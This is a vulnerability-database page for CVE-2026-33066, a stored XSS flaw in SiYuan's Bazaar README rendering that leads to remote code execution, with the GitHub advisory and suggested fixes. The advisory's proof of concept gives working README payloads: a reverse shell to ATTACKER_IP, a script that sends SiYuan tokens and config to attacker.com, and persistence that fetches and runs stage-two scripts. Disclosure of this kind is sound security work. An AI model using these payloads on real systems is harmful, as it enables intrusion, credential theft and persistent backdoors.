CVE-2026-33066 (GCVE-0-2026-33066)

Vulnerability from cvelistv5 – Published: 2026-03-20 08:11 – Updated: 2026-03-20 21:23

Title

SiYuan has Stored XSS to RCE via Unsanitized Bazaar README Rendering

Summary

SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the backend renderREADME function uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to innerHTML without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan's Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution. The issue was patched in version 3.6.1.

Severity ?

5.3 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/siyuan-note/siyuan/security/ad…	x_refsource_CONFIRM
	https://github.com/siyuan-note/siyuan/commit/b382…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	siyuan-note	siyuan	Affected: < 3.6.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33066",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-20T21:22:54.684811Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-20T21:23:07.778Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "siyuan",
          "vendor": "siyuan-note",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.6.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the backend renderREADME function uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to innerHTML without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan\u0027s Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution. The issue was patched in version 3.6.1."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T08:11:52.675Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v"
        },
        {
          "name": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428"
        }
      ],
      "source": {
        "advisory": "GHSA-4663-4mpg-879v",
        "discovery": "UNKNOWN"
      },
      "title": "SiYuan has Stored XSS to RCE via Unsanitized Bazaar README Rendering"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33066",
    "datePublished": "2026-03-20T08:11:52.675Z",
    "dateReserved": "2026-03-17T19:27:06.343Z",
    "dateUpdated": "2026-03-20T21:23:07.778Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33066\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T09:16:14.697\",\"lastModified\":\"2026-03-23T15:31:10.727\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the backend renderREADME function uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to innerHTML without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan\u0027s Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution. The issue was patched in version 3.6.1.\"},{\"lang\":\"es\",\"value\":\"SiYuan es un sistema de gesti\u00f3n de conocimiento personal. En las versiones 3.6.0 e inferiores, la funci\u00f3n renderREADME del backend utiliza lute.New() sin llamar a SetSanitize(true), lo que permite que el HTML sin procesar incrustado en Markdown pase sin modificar. El frontend luego asigna el HTML renderizado a innerHTML sin ninguna sanitizaci\u00f3n adicional. Un autor de paquete malicioso puede incrustar JavaScript arbitrario en su README que se ejecuta cuando un usuario hace clic para ver los detalles del paquete. Debido a que la configuraci\u00f3n de Electron de SiYuan habilita nodeIntegration: true con contextIsolation: false, este XSS escala directamente a la ejecuci\u00f3n remota de c\u00f3digo completa. El problema fue parcheado en la versi\u00f3n 3.6.1.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"LOW\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\",\"baseScore\":9.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.6.1\",\"matchCriteriaId\":\"E1AA6470-222A-4841-A487-DF65F9859780\"}]}]}],\"references\":[{\"url\":\"https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33066\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T21:22:54.684811Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T21:23:02.521Z\"}}], \"cna\": {\"title\": \"SiYuan has Stored XSS to RCE via Unsanitized Bazaar README Rendering\", \"source\": {\"advisory\": \"GHSA-4663-4mpg-879v\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"siyuan-note\", \"product\": \"siyuan\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.6.1\"}]}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v\", \"name\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428\", \"name\": \"https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the backend renderREADME function uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to innerHTML without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan\u0027s Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution. The issue was patched in version 3.6.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T08:11:52.675Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33066\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-20T21:23:07.778Z\", \"dateReserved\": \"2026-03-17T19:27:06.343Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T08:11:52.675Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33066

Vulnerability from fkie_nvd - Published: 2026-03-20 09:16 - Updated: 2026-03-23 15:31

Severity ?

9.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428	Patch
	security-advisories@github.com	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	b3log	siyuan	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1AA6470-222A-4841-A487-DF65F9859780",
              "versionEndExcluding": "3.6.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the backend renderREADME function uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to innerHTML without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan\u0027s Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution. The issue was patched in version 3.6.1."
    },
    {
      "lang": "es",
      "value": "SiYuan es un sistema de gesti\u00f3n de conocimiento personal. En las versiones 3.6.0 e inferiores, la funci\u00f3n renderREADME del backend utiliza lute.New() sin llamar a SetSanitize(true), lo que permite que el HTML sin procesar incrustado en Markdown pase sin modificar. El frontend luego asigna el HTML renderizado a innerHTML sin ninguna sanitizaci\u00f3n adicional. Un autor de paquete malicioso puede incrustar JavaScript arbitrario en su README que se ejecuta cuando un usuario hace clic para ver los detalles del paquete. Debido a que la configuraci\u00f3n de Electron de SiYuan habilita nodeIntegration: true con contextIsolation: false, este XSS escala directamente a la ejecuci\u00f3n remota de c\u00f3digo completa. El problema fue parcheado en la versi\u00f3n 3.6.1."
    }
  ],
  "id": "CVE-2026-33066",
  "lastModified": "2026-03-23T15:31:10.727",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 6.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "LOW",
          "subIntegrityImpact": "LOW",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T09:16:14.697",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-4663-4MPG-879V

Vulnerability from github – Published: 2026-03-18 16:09 – Updated: 2026-03-20 21:23

Summary

SiYuan has Stored XSS to RCE via Unsanitized Bazaar README Rendering

Details

Stored XSS to RCE via Unsanitized Bazaar README Rendering

Summary

SiYuan's Bazaar (community marketplace) renders package README content without HTML sanitization. The backend renderREADME function uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to innerHTML without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan's Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution.

Affected Component

README rendering (backend): kernel/bazaar/package.go:635-645 (renderREADME function)
README rendering (frontend): app/src/config/bazaar.ts:607 (innerHTML assignment)
Electron config: app/electron/main.js:422-426 (nodeIntegration: true, contextIsolation: false)

Affected Versions

- SiYuan <= 3.5.9

Severity

Critical — CVSS 9.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

CWE-79: Improper Neutralization of Input During Web Page Generation (Stored XSS)

Note: This vector requires one click (user viewing the package README), unlike the metadata vector which is zero-click.

Vulnerable Code

Backend: `kernel/bazaar/package.go:635-645`

func renderREADME(repoURL string, mdData []byte) (ret string, err error) {
    luteEngine := lute.New()  // Fresh Lute instance — SetSanitize NOT called
    luteEngine.SetSoftBreak2HardBreak(false)
    luteEngine.SetCodeSyntaxHighlight(false)
    linkBase := "https://cdn.jsdelivr.net/gh/" + ...
    luteEngine.SetLinkBase(linkBase)
    ret = luteEngine.Md2HTML(string(mdData))  // Raw HTML in Markdown is PRESERVED
    return
}

Compare with SiYuan's own note renderer in kernel/util/lute.go:81, which does sanitize:

luteEngine.SetSanitize(true)  // Notes ARE sanitized — but Bazaar README is NOT

This inconsistency demonstrates that the project is aware of the Lute sanitization API but failed to apply it to Bazaar content.

Frontend: `app/src/config/bazaar.ts:607`

fetchPost("/api/bazaar/getBazaarPackageREADME", {...}, response => {
    mdElement.innerHTML = response.data.html;  // Unsanitized HTML injected into DOM
});

The backend returns unsanitized HTML, and the frontend blindly assigns it to innerHTML without any client-side sanitization (e.g., DOMPurify).

Electron: `app/electron/main.js:422-426`

webPreferences: {
    nodeIntegration: true,
    contextIsolation: false,
    // ...
}

Any JavaScript executing in the renderer has direct access to Node.js APIs.

Proof of Concept

Step 1: Create a malicious README

Create a GitHub repository with a valid SiYuan plugin/theme/template structure. The README.md contains embedded HTML:

# Helpful Productivity Plugin

This plugin helps you organize your notes with smart templates and AI-powered suggestions.

## Features

- Smart template insertion
- AI-powered note organization
- Cross-platform sync

<img src=x onerror="require('child_process').exec('calc.exe')">

## Installation

Install via the SiYuan Bazaar marketplace.

## License

MIT

The raw <img> tag with onerror handler is valid Markdown (HTML passthrough). The Lute engine preserves it because SetSanitize(true) is not called. The frontend renders it via innerHTML, and the broken image triggers onerror, executing calc.exe.

Step 2: Submit to Bazaar

Submit the repository to the SiYuan Bazaar via the standard community contribution process.

Step 3: One-click RCE

When a SiYuan user browses the Bazaar, sees the package listing, and clicks on it to view the README/details, the unsanitized HTML renders in the detail panel. The onerror handler fires, executing arbitrary OS commands.

Escalation: Reverse shell

# Cool Theme for SiYuan

Beautiful dark theme with custom fonts.

<img src=x onerror="require('child_process').exec('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\"')">

Escalation: Multi-stage payload via README

A more sophisticated attack can hide the payload deeper in the README to avoid casual review:

# Professional Note Templates

A comprehensive collection of note templates for professionals.

## Templates Included

| Category | Count | Description |
|----------|-------|-------------|
| Business | 15 | Meeting notes, project plans |
| Academic | 12 | Research notes, citations |
| Personal | 8 | Journal, habit tracking |

## Screenshots

<!-- Legitimate-looking image reference -->
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://attacker.com/dark.png">
  <source media="(prefers-color-scheme: light)" srcset="https://attacker.com/light.png">
  <img src="https://attacker.com/screenshot.png" alt="Template Preview" onload="
    var c = require('child_process');
    var o = require('os');
    var f = require('fs');
    var p = require('path');

    // Exfiltrate sensitive data
    var home = o.homedir();
    var configDir = p.join(home, '.config', 'siyuan');
    var data = {};

    try { data.apiToken = f.readFileSync(p.join(configDir, 'cookie.key'), 'utf8'); } catch(e) {}
    try { data.conf = JSON.parse(f.readFileSync(p.join(configDir, 'conf.json'), 'utf8')); } catch(e) {}
    try { data.hostname = o.hostname(); data.user = o.userInfo().username; data.platform = o.platform(); } catch(e) {}

    // Send to attacker
    var https = require('https');
    var payload = JSON.stringify(data);
    var req = https.request({
      hostname: 'attacker.com', port: 443, path: '/collect', method: 'POST',
      headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
    });
    req.write(payload);
    req.end();

    // Drop persistence
    if (o.platform() === 'win32') {
      c.exec('schtasks /create /tn SiYuanSync /tr \"powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\\\"https://attacker.com/stage2.ps1\\\"))\" /sc onlogon /rl highest /f');
    } else {
      c.exec('(crontab -l 2>/dev/null; echo \"@reboot curl -s https://attacker.com/stage2.sh | bash\") | crontab -');
    }
  ">
</picture>

## Changelog

- v1.0.0: Initial release

This payload: 1. Uses onload instead of onerror (fires on successful image load from attacker's server) 2. Exfiltrates SiYuan API token, config, hostname, username, and platform info 3. Installs cross-platform persistence (Windows scheduled task / Linux crontab) 4. Is buried inside a legitimate-looking <picture> element that blends with real README content

Escalation: SVG-based payload (bypasses naive img filtering)

## Architecture

<svg onload="require('child_process').exec('id > /tmp/pwned')">
  <rect width="100" height="100" fill="blue"/>
</svg>

Escalation: Details/summary element (interactive trigger)

## FAQ

<details ontoggle="require('child_process').exec('whoami > /tmp/pwned')" open>
  <summary>How do I install this plugin?</summary>
  Use the SiYuan Bazaar to install.
</details>

The open attribute causes ontoggle to fire immediately without user interaction with the element itself.

Attack Scenario

Attacker creates a legitimate-looking GitHub repository with a SiYuan plugin/theme/template.
The README contains a well-crafted payload hidden within legitimate-looking content (e.g., inside a <picture> tag, <details> block, or <svg>).
Attacker submits the package to the SiYuan Bazaar via the community contribution process.
A SiYuan user browses the Bazaar and clicks on the package to view its details/README.
The backend renders the README via renderREADME() without sanitization.
The frontend assigns the HTML to innerHTML.
The injected JavaScript executes with full Node.js access.
The attacker achieves RCE — reverse shell, data theft, persistence, etc.

Impact

Full remote code execution on any SiYuan desktop user who views the malicious package README
One-click — triggered by viewing package details in the Bazaar
Supply-chain attack via the official SiYuan community marketplace
Payloads can be deeply hidden in legitimate-looking README content, making code review difficult
Can steal API tokens, SiYuan configuration, SSH keys, browser credentials, and arbitrary files
Can install persistent backdoors across Windows, macOS, and Linux
Multiple HTML elements can carry payloads (img, svg, details, picture, video, audio, iframe, object, embed, math, etc.)
Affects all platforms: Windows, macOS, Linux

Suggested Fix

1. Enable Lute sanitization for README rendering (`package.go`)

func renderREADME(repoURL string, mdData []byte) (ret string, err error) {
    luteEngine := lute.New()
    luteEngine.SetSanitize(true)  // ADD THIS — matches note renderer behavior
    luteEngine.SetSoftBreak2HardBreak(false)
    luteEngine.SetCodeSyntaxHighlight(false)
    linkBase := "https://cdn.jsdelivr.net/gh/" + ...
    luteEngine.SetLinkBase(linkBase)
    ret = luteEngine.Md2HTML(string(mdData))
    return
}

2. Add client-side sanitization as defense-in-depth (`bazaar.ts`)

import DOMPurify from 'dompurify';

fetchPost("/api/bazaar/getBazaarPackageREADME", {...}, response => {
    mdElement.innerHTML = DOMPurify.sanitize(response.data.html);
});

3. Long-term: Harden Electron configuration

webPreferences: {
    nodeIntegration: false,
    contextIsolation: true,
    sandbox: true,
}

Severity ?

5.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260314111550-b382f50e1880"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33066"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T16:09:24Z",
    "nvd_published_at": "2026-03-20T09:16:14Z",
    "severity": "MODERATE"
  },
  "details": "# Stored XSS to RCE via Unsanitized Bazaar README Rendering\n\n## Summary\n\nSiYuan\u0027s Bazaar (community marketplace) renders package README content without HTML sanitization. The backend `renderREADME` function uses `lute.New()` without calling `SetSanitize(true)`, allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to `innerHTML` without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan\u0027s Electron configuration enables `nodeIntegration: true` with `contextIsolation: false`, this XSS escalates directly to full Remote Code Execution.\n\n## Affected Component\n\n- **README rendering (backend)**: `kernel/bazaar/package.go:635-645` (`renderREADME` function)\n- **README rendering (frontend)**: `app/src/config/bazaar.ts:607` (`innerHTML` assignment)\n- **Electron config**: `app/electron/main.js:422-426` (`nodeIntegration: true`, `contextIsolation: false`)\n\n## Affected Versions\n\n- SiYuan \u003c= 3.5.9\n- \n## Severity\n\n**Critical** \u2014 CVSS 9.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)\n\n- CWE-79: Improper Neutralization of Input During Web Page Generation (Stored XSS)\n\nNote: This vector requires one click (user viewing the package README), unlike the metadata vector which is zero-click.\n\n## Vulnerable Code\n\n### Backend: `kernel/bazaar/package.go:635-645`\n\n```go\nfunc renderREADME(repoURL string, mdData []byte) (ret string, err error) {\n    luteEngine := lute.New()  // Fresh Lute instance \u2014 SetSanitize NOT called\n    luteEngine.SetSoftBreak2HardBreak(false)\n    luteEngine.SetCodeSyntaxHighlight(false)\n    linkBase := \"https://cdn.jsdelivr.net/gh/\" + ...\n    luteEngine.SetLinkBase(linkBase)\n    ret = luteEngine.Md2HTML(string(mdData))  // Raw HTML in Markdown is PRESERVED\n    return\n}\n```\n\nCompare with SiYuan\u0027s own note renderer in `kernel/util/lute.go:81`, which **does** sanitize:\n\n```go\nluteEngine.SetSanitize(true)  // Notes ARE sanitized \u2014 but Bazaar README is NOT\n```\n\nThis inconsistency demonstrates that the project is aware of the Lute sanitization API but failed to apply it to 